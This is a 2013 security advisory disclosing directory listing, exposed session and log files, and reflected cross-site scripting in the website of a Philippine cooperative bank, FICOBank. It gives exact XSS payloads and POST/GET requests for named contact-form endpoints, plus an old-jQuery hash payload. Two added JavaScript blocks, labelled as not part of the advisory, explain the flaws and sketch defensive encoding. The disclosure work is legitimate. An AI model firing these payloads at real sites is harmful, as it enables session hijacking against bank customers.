FICOBank Information Disclosure / Cross Site Scripting

23 Aug 2013 | Reported by Juan Carlos Garcia | Type: packetstorm | Source: packetstormsecurity.com

FICOBank Directory Listing Information Disclosure / Cross Site Scripting Vulnerability

FICOBank Directory Listing Information Disclosure / Cross Site Scripting / Jquery Old Version Vulnerable
  
  
Report-Timeline:  
================  
  
23-08-2013 Advisory  
  
Response:"Our country does not have the same laws as their own and we do not consider to be security flaws the data you send us.  
Thank you very much"  
  
( /ME I don't understand this response.. Is it a joke? )
  
20-08-2013 Full Disclosure  
  
  
I-VULNERABILITY  
-------------------------  
  
#Title: FICOBank Directory Listing Information Disclosure / Cross Site Scripting / Jquery Old Version Vulnerable  
  
#Vendor: http://www.ficobank.com / http://ficobank.com

#Author: Juan Carlos García (@secnight)
  
#Follow me   
  
http://www.highsec.es  
Twitter:@secnight  
  
  
  
II-Introduction:  
=============  
  
The First Isabela Cooperative Bank (FICOBank) is one of the pioneer and prominent cooperative banks in the Philippines.  
Its origin is deeply rooted in the community, as it was organized 36 years ago by two cooperatives and 47 samahang nayons,   
which represented the farmers who have limited resources and access to banking services. From a molehill-size cooperative rural  
bank that it opted to be, it elevated to a mountain-high cooperative bank,   
as it can now lay claim to a resource base of over Php 2.37 billion (as of December 31, 2012).  
  
-------------------------  
  
III-PROOF OF CONCEPT  
====================  
  
Attack details  
--------------  
  
Directory Listing  
*****************  
  
The web server is configured to display the list of files contained in this directory.
This is not recommended because the directory may contain files that are not normally
exposed through links on the web site. A user can view a list of all files from this
directory, possibly exposing sensitive information.
  
Affected items  
  
http://ficobank.com/annualreport/  
  
/annualreport   
/annualreport/_notes   
/annualreport/annualreport   
/Assets4Sale   
/Assets4Sale/a4sale   
/Assets4Sale/a4sale/_notes   
/contact   
/contact/_notes   
/contact/html-contact-form-captcha   
/contact/html-contact-form-captcha/_notes   
/contact/html-contact-form-captcha/scripts   
/contact/html-contact-form-captcha/scripts/_notes   
/contact/scripts   
/contact/scripts/_notes   
/contact/scripts-old   
/contact/scripts-old/_notes   
/DepositProducts   
/DepositProducts/_notes   
/Ficonnect   
/flash   
/flash/_notes   
/images   
/images/awards   
/images/images   
/images/jobopening   
/images/jobopening/_notes   
/images/officer   
/images/signature   
/images/signature/_notes   
/images/slides   
/Leadership   
/LoanProducts   
/news   
/news/_notes   
/OtherServices   
/OtherServices/_notes   
/scripts   
/scripts/_notes   
/Stylesheet   
/Stylesheet/_notes   
  
Temporary file/directory  
  
Affected items  
  
http://www.ficobank.com/tmp/  
  
/tmp   
/tmp/mailError.log   
/tmp/sess_secnightsessionfixation   
/tmp/sess_b35e89c88df72a4c589a5a8e1a495594   
/tmp/sess_f277f2a2689ac1ee7b04b527b80b9b7c   
/tmp/untitled  
  
File Lock  
  
These lock files often contain usernames of the user that  
has locked the file. Username harvesting can be done using this technique...  
  
  
http://www.ficobank.com/DepositProducts/  
  
Cross Site Scripting  
****************  
  
Cross site scripting (also referred to as XSS) is a vulnerability that allows
an attacker to send malicious code (usually in the form of JavaScript) to another user.
Because a browser cannot know if the script should be trusted or not, it will execute
the script in the user context, allowing the attacker to access any cookies or session tokens
retained by the browser.


Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into
a vulnerable application to fool a user in order to gather data from them. An attacker can steal the
session cookie and take over the account, impersonating the user. It is also possible to modify the content
of the page presented to the user.
  
  
Affected items  
  
/contact/contactus.php   
  
URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(947854) bad='  
The input is reflected inside a tag parameter between single quotes.  
  
  
Variant email(2)  
  
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28947854%29%20bad%3d%27&message=20&name=secnight&submit=Submit  
  
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28924627%29%20bad%3d%27&message=20&name=jjxlxmqv&submit=Submit  
  
  
  
Variant Name  
  
URL encoded POST input name was set to secnight'and jjxlxmqv' onmouseover=prompt(991722) bad='  
The input is reflected inside a tag parameter between single quotes.  
  
POST /contact/contactus.php   
  
6_letters_code=94102&email=sample%40email.tst&message=20&name=secnight%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit  
6_letters_code=94102&email=sample%40email.tst&message=20&name=jjxlxmqv%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit  
  
  
/contact/email.php   
  
URI was set to #" onmouseover=prompt(919235) //  
The input is reflected inside a tag parameter between double quotes.  
  
GET /contact/email.php/%F6%22%20onmouseover=prompt(919235)%20//  
  
  
/contact/email.php.bak   
  
URI was set to #" onmouseover=prompt(994575) //  
  
GET /contact/email.php.bak/%F6%22%20onmouseover=prompt(994575)%20//   
  
  
/contact/email.php.BAK  
  
URI was set to #" onmouseover=prompt(924567) //  
  
The input is reflected inside a tag parameter between double quotes.  
  
  
GET /contact/email.php.BAK/%F6%22%20onmouseover=prompt(924567)%20//  
  
  
/contact/html-contact-form-captcha/html-contact-form.php (4)  
  
URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(913822) bad='  
  
POST /contact/html-contact-form-captcha/html-contact-form.php  
  
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28913822%29%20bad%3d%27&message=20&name=fpfvlamn&submit=Submit  
  
  
/contact/samplexyz.php (7)  
  
URL encoded POST input contactname was set to pdnfeddf" onmouseover=prompt(969944) bad="  
  
POST /contact/samplexyz.php  
  
contactname=pdnfeddf%22%20onmouseover%3dprompt%28969944%29%20bad%3d%22&email=sample%40email.tst&subject=1  
  
Variants contactname,email,subject  
  
  
/contact/samplexyz.php.bak   
  
URI was set to #" onmouseover=prompt(959358) //  
The input is reflected inside a tag parameter between double quotes.  
  
GET /contact/samplexyz.php.bak/%F6%22%20onmouseover=prompt(959358)%20//   
  
  
/contact/samplexyz.php.BAK  
  
URI was set to #" onmouseover=prompt(966989) //  
  
GET /contact/samplexyz.php.BAK/%F6%22%20onmouseover=prompt(966989)%20//  
  
  
/contactus.php(4)  
  
Variant email, name  
  
email(3)  
  
URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(971885) bad='  
  
  
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28971885%29%20bad%3d%27&message=20&name=bxaskxpx&submit=Submit  
  
name(1)  
  
URL encoded POST input name was set to iwelgyng' onmouseover=prompt(991324) bad='  
  
6_letters_code=94102&email=sample%40email.tst&message=20&name=iwelgyng%27%20onmouseover%3dprompt%28991324%29%20bad%3d%27&submit=Submit  
  
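The single-quoted attribute reflection reported above, as an added example that is not part of the advisory and not code from ficobank.com: a constructed stand-in for the contact form's email field is rendered once with an encoder that leaves single quotes alone (the behaviour of PHP htmlspecialchars() without ENT_QUOTES) and once with one that encodes them, and a small attribute tokenizer checks whether the payload's onmouseover became an attribute of its own.

```javascript
// Added example, not code from the advisory or from ficobank.com: why a value
// reflected inside a single-quoted attribute is exploitable with the payload
// shown above, and which encoding closes it. The form markup is a constructed
// stand-in for contactus.php re-populating its "email" field.
const PAYLOAD = "sample@email.tst' onmouseover=prompt(947854) bad='";

// Encoder that mirrors PHP htmlspecialchars() defaults: & < > " only.
// A single quote passes through, which is exactly the gap for value='...'.
function encodeNoSingleQuote(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;")
          .replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

// Attribute-safe encoder (the ENT_QUOTES equivalent): also encodes the single quote.
function encodeAttr(s) {
  return encodeNoSingleQuote(s).replace(/'/g, "&#039;");
}

// Constructed stand-in for the form field as the server would render it back.
function renderEmailField(value, encode) {
  return `<input type='text' name='email' value='${encode(value)}'>`;
}

// Return the names of on* event-handler attributes that ended up as attributes
// of the tag, i.e. outside the quoted value. A small attribute tokenizer is
// enough for this single tag; it is not a general HTML parser.
function strayHandlerAttrs(tag) {
  const attrs = tag.match(/\s(\w+)\s*=\s*('[^']*'|"[^"]*"|[^\s>'"]+)/g) || [];
  return attrs.map(a => a.trim().split("=")[0].toLowerCase())
              .filter(name => name.startsWith("on"));
}

const vulnerable = renderEmailField(PAYLOAD, encodeNoSingleQuote);
const hardened = renderEmailField(PAYLOAD, encodeAttr);
```

The same check applies to the double-quoted contexts listed above: an encoder that handles only one quote character is safe only in the other context.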
  
Jquery Old Version Vulnerable  
***************************  
  
jQuery JavaScript Library v1.4.2  
  
This problem was fixed in jQuery 1.6.3.  
  
This page is using an older version of jQuery that is vulnerable to a Cross Site Scripting vulnerability.
Many sites pass location.hash straight to $() to select an element, which lets someone inject
script into the page through the URL fragment.

$("#id") is a CSS selector, $("<img>") is createElement, and in this version $("#<img>") is createElement too.
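An added example, not code from the advisory or from jQuery: the "HTML or #id?" test that $() applies, reduced to the quick-match expressions from jQuery 1.4.2 and 1.6.3 so the location.hash case can be checked offline without loading jQuery (the two patterns are reproduced from memory of those sources, so treat their exact form as an assumption), plus a defender-side guard that only lets a plain fragment identifier through before it reaches $(). The hash payload is the one the advisory shows under /OtherServices/jquery.fade.js.

```javascript
// Added example (not from the advisory or the jQuery project): how $(str)
// decided between "create HTML" and "select by id" before and after the
// 1.6.3 fix. Regexes are reproduced from those releases as an assumption.
// jQuery 1.4.2: a string may start with anything but '<' and still take the
// HTML branch (group 1), so '#<img ...>' creates elements instead of selecting.
const QUICK_EXPR_142 = /^[^<]*(<[\w\W]+>)[^>]*$|^#([\w-]+)$/;
// jQuery 1.6.3: no '#' may precede the HTML branch, so '#<img ...>' matches
// neither branch and is handed to the selector engine, which rejects it.
const QUICK_EXPR_163 = /^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/;

// Classify how $(str) would interpret str under a given quickExpr:
// "html" (creates elements), "id" (getElementById) or "selector" (CSS engine).
function classify(str, quickExpr) {
  const m = quickExpr.exec(str);
  if (m && m[1]) return "html";
  if (m && m[2] !== undefined) return "id";
  return "selector";
}

// Defender-side guard: accept only a plain fragment identifier from the URL
// before it reaches any selector or DOM API. Returns null for anything else,
// so the application never passes raw location.hash to $() at all.
function safeHashId(hash) {
  const m = /^#([A-Za-z][\w-]*)$/.exec(hash);
  return m ? m[1] : null;
}

// Constructed inputs: the advisory's fragment payload and a benign fragment.
const HASH_PAYLOAD = "#<img src=/ onerror=alert(1)>";
const HASH_BENIGN = "#section-2";
```

Upgrading jQuery removes the "html" classification, but the guard is still worth keeping, since a fragment that passes the selector engine can still select an element the page did not intend.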
  
  
Affected items  
  
/OtherServices/fade.min.js   
  
  
GET /OtherServices/fade.min.js   
  
Response:  
  
HTTP/1.1 200 OK  
Date: Fri, 23 Aug 2013 15:48:45 GMT  
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 13 Dec 2011 07:09:36 GMT  
Accept-Ranges: bytes  
Content-Type: application/x-javascript  
Age: 0  
Connection: keep-alive  
Server: YTS/1.20.28  
  
  
/OtherServices/jquery.fade.js   
  
  
GET /OtherServices/jquery.fade.js   
jquery_xss/#<img src=/ onerror=alert(1)>  
  
Response  
  
HTTP/1.1 200 OK  
Date: Fri, 23 Aug 2013 15:48:46 GMT  
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"  
Last-Modified: Tue, 13 Dec 2011 07:09:52 GMT  
Accept-Ranges: bytes  
Content-Type: application/x-javascript  
Age: 0  
Connection: keep-alive  
Server: YTS/1.20.28  
Content-Length: 72174  
  
  
/scripts/fade.min.js   
  
  
GET /scripts/fade.min.js   
  
Response  
  
HTTP/1.1 200 OK  
Date: Fri, 23 Aug 2013 15:48:46 GMT  
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"  
Last-Modified: Thu, 11 Jul 2013 03:44:10 GMT  
Accept-Ranges: bytes  
Content-Type: application/x-javascript  
Age: 0  
Connection: keep-alive  
Server: YTS/1.20.28  
Content-Length: 72174  
  
  
/scripts/jquery.fade.js   
  
  
GET /scripts/jquery.fade.js
  
Response  
  
The same..  
  
  
IV. CREDITS  
-------------------------  
  
This vulnerability has been discovered
by Juan Carlos García (@secnight)
  
Special Thanks: Perseo  
  
  
V. LEGAL NOTICES  
-------------------------  
  
The Author accepts no responsibility for any damage  
caused by the use or misuse of this information.  
